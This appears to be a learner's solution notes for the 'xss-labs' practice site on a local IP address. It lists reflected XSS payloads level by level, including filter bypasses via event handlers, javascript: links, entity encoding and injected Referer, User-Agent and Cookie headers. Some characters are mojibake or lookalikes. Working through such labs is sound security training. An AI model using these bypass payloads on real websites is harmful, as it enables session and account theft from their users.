level1
http://192.168.1.5/xss-labs/level1.php?name=%3Cscript%3Ealert(/xss/)%3C/script%3E
http://192.168.1.5/xss-labs/level1.php?name=<script>alert(/xss/)</script>
level2
http://192.168.1.5/xss-labs/level2.php?keyword=1%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://192.168.1.5/xss-labs/level2.php?keyword=1"><script>alert(/xss/)</script>
level3
http://192.168.1.5/xss-labs/level3.php?keyword=1ok%27%20οnclick=%27javascript:alert(/xss/)%27
http://192.168.1.5/xss-labs/level3.php?keyword=1ok' οnclick='javascript:alert(/xss/)'
level4
http://192.168.1.5/xss-labs/level4.php?keyword=1%22%20οnclick=%27alert(/xss/)%27&submit=%E6%90%9C%E7%B4%A2
http://192.168.1.5/xss-labs/level4.php?keyword=1" οnclick='alert(/xss/)'&submit=æç´¢
level5
http://192.168.1.5/xss-labs/level5.php?keyword=%22%3E%20%3Ca%20href=%22javascript:alert(/xss/)%22%3Elink%3C/a%3E&submit=%E6%90%9C%E7%B4%A2
http://192.168.1.5/xss-labs/level5.php?keyword="> <a href="javascript:alert(/xss/)">link</a>&submit=æç´¢
level6
http://192.168.1.5/xss-labs/level6.php?keyword=%22%3E%3Ca%20hrEf=%22javascript:alert(/xss/)%22%3Elink%3C/a%3E&submit=%E6%90%9C%E7%B4%A2
http://192.168.1.5/xss-labs/level6.php?keyword="><a hrEf="javascript:alert(/xss/)">link</a>&submit=æç´¢
level7
http://192.168.1.5/xss-labs/level7.php?keyword=sdasdsa%27%3E%22oonnclick=%22alert(/xss/)%22
http://192.168.1.5/xss-labs/level7.php?keyword=sdasdsa'>"oonnclick="alert(/xss/)"
level8
http://192.168.1.5/xss-labs/level8.php?keyword=javascri%26%23x70t%3Aalert%28%2Fxss%2F%29&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5
http://192.168.1.5/xss-labs/level8.php?keyword=javascript:alert(/xss/)&submit=æ·»å åæé¾æ¥
level9
http://192.168.1.5/xss-labs/level9.php?keyword=javascri%26%23x70t%3Aalert%28%27xss%27%29%3B%2F%2Fhttp%3A%2F%2Fwww.baidu.com&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5
http://192.168.1.5/xss-labs/level9.php?keyword=javascript:alert('xss');//http://www.baidu.com&submit=æ·»å åæé¾æ¥
level10
http://192.168.1.5/xss-labs/level10.php?keyword=%22%3Cscript%3E%3C/script%3E&t_sort=xcxc%22%20type=text%20οnclick=%22alert(/xss/)%22
http://192.168.1.5/xss-labs/level10.php?keyword="<script></script>&t_sort=xcxc" type=text οnclick="alert(/xss/)"
level11
GET /xss-labs/level11.php?keyword=zcxzcxzcxzcz&t_sort=cxzczczczcxc HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Referer: " type="text" οnclick="alert(/xss/)"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
修改Referer
level12
GET /xss-labs/level12.php?keyword=good%20job! HTTP/1.1
Host: 192.168.1.5
User-Agent: " type="text" οnclick="alert(/xss/)"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.5/xss-labs/level11.php?keyword=zcxzcxzcxzcz&t_sort=cxzczczczcxc
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
修改user-agent
level13
GET /xss-labs/level14.php HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.5/xss-labs/level13.php?keyword=good%20job!
Cookie: user=" type=text οnclick=javascript:alert(/xss/) '
Upgrade-Insecure-Requests: 1
修改cookie
level14
不好使
level15
通过查看源代码得知此处为ng-include,那么配合第一个关
192.168.1.5/xss-labs/level15.php?src='level1.php?name=<img src="xcxcxx" οnerrοr="javascript:alert(/xss/)"/>'
level16
空格绕过
http://192.168.1.5/xss-labs/level16.php?keyword=%3Cinput%0aοnclick=%22alert(%27xss%27)%22%3E
http://192.168.1.5/xss-labs/level16.php?keyword=%3Cinput%0cοnclick=%22alert(%27xss%27)%22%3E
level17
http://192.168.1.5/xss-labs/level17.php?arg01=a&arg02=b%20οnmοuseοver=alert(/xss/)
level18
http://192.168.1.5/xss-labs/level18.php?arg01=a&arg02=b οnclick=alert(/xss/)
level 19
搞不懂
arg01=version&arg02=<a href="javascript:alert(1)">123</a>
网上说需要反编译。。。
level20
搞不懂